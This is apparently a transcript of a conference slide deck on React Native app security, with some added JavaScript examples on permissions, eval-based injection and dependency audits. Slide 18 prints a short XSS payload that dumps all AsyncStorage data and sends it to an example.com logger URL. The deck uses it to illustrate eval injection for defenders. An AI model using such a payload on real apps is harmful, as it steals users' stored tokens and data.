
React Native Security

Julia Mezher
September 24, 2021


Transcript

  1. Julia Potapenko
    React Native Security
    Addressing Typical Mistakes
    Let's shed light on React Native apps’ security and
    explain some risks and threats developers should
    address to prevent typical mistakes.
    @julepka cossacklabs.com

  2. About me 👩💻
    Security Software Engineer at Cossack Labs
    Leader of OWASP Zhytomyr Chapter, Ukraine 🇺🇦
    ❤︎ OWASP MASVS/MSTG Project
    We help companies to protect their
    sensitive and valuable data.

  3. We will talk about
    Architecture
    Platforms usage
    Dependencies
    Security testing

  4. “Choosing React Native and its components
    means that you understand and accept
    potential security consequences.”

  5. Architecture basics
    React Native is a cross-platform solution from Facebook that
    allows writing native apps using React (JavaScript or
    TypeScript).


  8. Trusting third parties
    Native platforms = Apple and Google
    React Native = Facebook
    TypeScript = Microsoft
    CVE-2020-1911, CVE-2020-1912, CVE-2020-1913

  9. “With React Native, developers deal with
    security for all three platforms: iOS, Android
    and React Native.”

  10. OWASP Mobile Top 10, #1: Improper Platform Usage

  11. React Native is a leaky abstraction
    @vixentael


  13. Secure Store Example
                                         iOS (Keychain)                   Android (SharedPreferences + KeyStore)
    Data stored encrypted                Yes                              Yes
    Data persists across app reinstalls  Yes                              No
    Hardware-backed encryption           Yes                              Depends on device vendor
    Data decrypted only before usage     Decrypted when device unlocked   Yes


  16. Managing Android Permissions
    Android: You can add permissions in multiple files
    +
    React Native: It is common practice to use third-party solutions
    =
    💥🤯💥
    “I don’t need this permission”
    “The app crashes if I delete it”
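One way to find out which manifest actually introduced a permission before anyone deletes it, as an added JavaScript example that is not from the talk; the manifest contents, library names and paths below are constructed samples.

```javascript
// Added example, not from the talk: trace each <uses-permission> back to the
// manifest that declares it, so a permission nobody on the team recognises can
// be attributed to the dependency that needs it. The manifests are constructed;
// a real run would read the app manifest and each
// node_modules/<lib>/android/src/main/AndroidManifest.xml from disk.
const PERMISSION_RE = /<uses-permission[^>]*android:name="([^"]+)"/g;
const manifests = {
  "android/app/src/main/AndroidManifest.xml": `
    <manifest xmlns:android="http://schemas.android.com/apk/res/android">
      <uses-permission android:name="android.permission.INTERNET" />
      <uses-permission android:name="android.permission.CAMERA" />
    </manifest>`,
  "node_modules/example-camera-lib/android/src/main/AndroidManifest.xml": `
    <manifest xmlns:android="http://schemas.android.com/apk/res/android">
      <uses-permission android:name="android.permission.CAMERA" />
      <uses-permission android:name="android.permission.RECORD_AUDIO" />
    </manifest>`,
  "node_modules/example-analytics-sdk/android/src/main/AndroidManifest.xml": `
    <manifest xmlns:android="http://schemas.android.com/apk/res/android">
      <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    </manifest>`,
};

// Returns { permissionName: [manifest paths that declare it] }.
function collectPermissions(files) {
  const byPermission = {};
  for (const [path, xml] of Object.entries(files)) {
    for (const match of xml.matchAll(PERMISSION_RE)) {
      const perm = match[1];
      if (!byPermission[perm]) byPermission[perm] = [];
      byPermission[perm].push(path);
    }
  }
  return byPermission;
}

// Permissions that only dependencies declare: the Gradle manifest merger puts
// them into the APK even though the app manifest never mentions them, so
// deleting them from the app manifest changes nothing. The dependency has to
// be reviewed, configured or replaced instead.
function permissionsFromDependenciesOnly(byPermission) {
  return Object.entries(byPermission)
    .filter(([, paths]) => paths.every((p) => p.startsWith("node_modules/")))
    .map(([perm]) => perm)
    .sort();
}

const report = collectPermissions(manifests);
console.log(report);
console.log("declared only by dependencies:", permissionsFromDependenciesOnly(report));
```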


  18. Is XSS possible?
    XSS possibility is decreased by design.
    XSS is still possible.
    eval()
    _reactNative.AsyncStorage.getAllKeys(function(err, result) {
      _reactNative.AsyncStorage.multiGet(result, function(err, result) {
        fetch('http://example.com/logger.php?token=' + JSON.stringify(result));
      });
    });
    Steal all the data from local storage (AsyncStorage) by exploiting eval-based
    injection and accessing React Native APIs
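The vulnerable pattern from the slide beside its hardened form, as an added JavaScript example that is not from the talk: an eval-based "remote config" parser next to a strict JSON parser. The config strings, `ALLOWED_KEYS` and the `injectedCodeRan` flag are constructed for this demonstration.

```javascript
// Added example, not from the talk. Assumed scenario: the app receives a
// configuration string from a server or deep link and turns it into an object.
const ALLOWED_KEYS = new Set(["theme", "featureFlags"]);

// Vulnerable: eval() executes whatever the string contains, so any JavaScript
// an attacker can get into it runs with the app's privileges and can reach
// React Native APIs such as AsyncStorage.
function parseConfigUnsafe(text) {
  return eval("(" + text + ")");
}

// Hardened: JSON.parse never executes code, non-object documents are rejected,
// and unknown keys are dropped so a hostile document cannot smuggle in
// settings the app never expected. Throws on anything that is not JSON.
function parseConfigSafe(text) {
  const parsed = JSON.parse(text);
  if (parsed === null || typeof parsed !== "object" || Array.isArray(parsed)) {
    throw new Error("config must be a JSON object");
  }
  const out = {};
  for (const key of Object.keys(parsed)) {
    if (ALLOWED_KEYS.has(key)) out[key] = parsed[key];
  }
  return out;
}

// Constructed inputs. The hostile one is a benign stand-in for injected code:
// it only records that it ran.
globalThis.injectedCodeRan = false;
const benignConfig = '{"theme": "dark", "featureFlags": {"beta": true}}';
const hostileConfig =
  '(function () { globalThis.injectedCodeRan = true; return {"theme": "dark"}; })()';

// Reports whether feeding `text` to `parser` made the injected code execute.
function codeRuns(parser, text) {
  globalThis.injectedCodeRan = false;
  try {
    parser(text);
  } catch (_) {
    // the strict parser rejects non-JSON input; that is the desired outcome
  }
  return globalThis.injectedCodeRan;
}

console.log("eval parser runs injected code:", codeRuns(parseConfigUnsafe, hostileConfig));
console.log("JSON parser runs injected code:", codeRuns(parseConfigSafe, hostileConfig));
```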


  21. Jailbreak and Root detection
    It is never easy for regular iOS and Android teams.
    There are no ready-to-go React Native solutions:
    a. implement on your own
    b. use third-party solutions for each platform and write bridging code
    Example: IOSSecuritySuite https://github.com/securing/IOSSecuritySuite
    Swift ➤ Objective-C ➤ React Native

  22. “50 shades of dependencies”


  24. A typical situation
    They’ve updated dependencies half a year later…

  25. Monitoring dependencies 🤯
    So many dependencies
    Additional CI work
    One update triggers another update
    Integrating dependency checkers
    Updates may be incompatible
    What if there is no fix for vulnerability?
    Architectural changes required
    Tight deadlines

  26. What if there is no fix?
    ✅ Learn more about the issue, its scope
    ✅ Document it, make the team aware
    ✅ Monitor it and book the time for the update
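A way to turn the three steps above into something a CI job can produce, as an added JavaScript example that is not from the talk: triage of `npm audit --json` output so that advisories without a fix become a documented, monitored list. The audit document is constructed; it follows the npm 7+ shape, and the `fixAvailable` field (true, false, or an object carrying `isSemVerMajor`) is assumed to be present as in that format.

```javascript
// Added example, not from the talk. The audit document is a constructed sample
// in the npm 7+ `npm audit --json` shape; `fixAvailable` is assumed to be
// true, false, or { name, version, isSemVerMajor } as in that format.
const sampleAudit = {
  vulnerabilities: {
    "example-xml-lib": {
      name: "example-xml-lib", severity: "high",
      fixAvailable: { name: "example-xml-lib", version: "2.0.1", isSemVerMajor: true },
      via: [{ title: "Constructed: unsafe entity expansion", url: "https://example.invalid/1" }],
    },
    "example-old-transport": {
      name: "example-old-transport", severity: "moderate",
      fixAvailable: false,
      via: [{ title: "Constructed: no patched release", url: "https://example.invalid/2" }],
    },
    "example-wrapper": {
      name: "example-wrapper", severity: "moderate",
      fixAvailable: false,
      via: ["example-old-transport"], // transitive: vulnerable only through its dependency
    },
  },
};

// Splits advisories into the three buckets a planning session needs: fixable
// in place, fixable only through a semver-major (possibly architecture-changing)
// upgrade, and no fix at all.
function triage(audit) {
  const result = { fixable: [], majorUpgrade: [], noFix: [] };
  for (const v of Object.values(audit.vulnerabilities)) {
    const entry = {
      name: v.name,
      severity: v.severity,
      // Object entries in `via` are advisories; string entries name the
      // dependency the vulnerability is inherited from.
      advisories: v.via.filter((x) => typeof x === "object").map((x) => x.title),
    };
    if (v.fixAvailable === false) result.noFix.push(entry);
    else if (v.fixAvailable === true || !v.fixAvailable.isSemVerMajor) result.fixable.push(entry);
    else result.majorUpgrade.push(entry);
  }
  return result;
}

// One line per unfixable advisory for the team's risk register, ending with the
// reminder the slide asks for: monitor it and book the time.
function riskRegisterLines(audit) {
  return triage(audit).noFix.map((e) => {
    const why = e.advisories.length ? e.advisories.join("; ") : "inherited from a dependency";
    return `[${e.severity}] ${e.name}: no fix available (${why}); re-check next sprint`;
  });
}

console.log(riskRegisterLines(sampleAudit).join("\n"));
```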

  27. Plan time carefully!
    ➡ iOS or Android update
    ➡ React Native update
    ➡ Forked version update
    ➡ Dependencies update
    ➡ Mobile app source code update

  28. Security testing of React Native apps


  30. OWASP MASVS: Mobile Application Security Verification Standard
    https://github.com/OWASP/owasp-masvs
    OWASP MSTG: Mobile Security Testing Guide
    https://github.com/OWASP/owasp-mstg
    “Please note that the MSTG focuses primarily
    on native apps. These are apps built with
    Java or Kotlin using the Android SDK for
    Android or built with Swift or Objective-C
    using the Apple SDKs for iOS. Apps using
    frameworks such as Nativescript, React-native,
    Xamarin, Cordova, etc. are not within
    the main focus of the MSTG. However, some
    essential controls, such as certificate pinning,
    have been explained already for some of
    these platforms.”

  31. You can still use MASVS!
    OWASP MASVS is language agnostic. All requirements are relevant
    for React Native apps because they are “native” under the hood.

  32. You can still use MSTG!
    General ideas will be similar. You either look for similar JavaScript
    implementation or native code with bridging functions.

  33. How do we test RN app security?
    1. Use MASVS requirements.
    2. Review JavaScript dependencies’ source code to understand the
    native controls behind them.
    You need to be able to read all the languages: JavaScript
    (TypeScript), Objective-C (Swift), Java (Kotlin).
    3. Use ASVS and WSTG to cover JavaScript-specific vulnerabilities
    like XSS.


  35. Final thoughts…
    “Learn once, write anywhere.”
    “Learn once, ask mobile security
    people for help.”

  36. Where to go next?
    My React Native Security Article
    https://www.cossacklabs.com/blog/react-native-app-security.html
    React Native Security Guide
    https://reactnative.dev/docs/security
    OWASP MASVS Hybrid Apps discussion
    https://github.com/OWASP/owasp-masvs/discussions/557

  37. Thank you!
    @julepka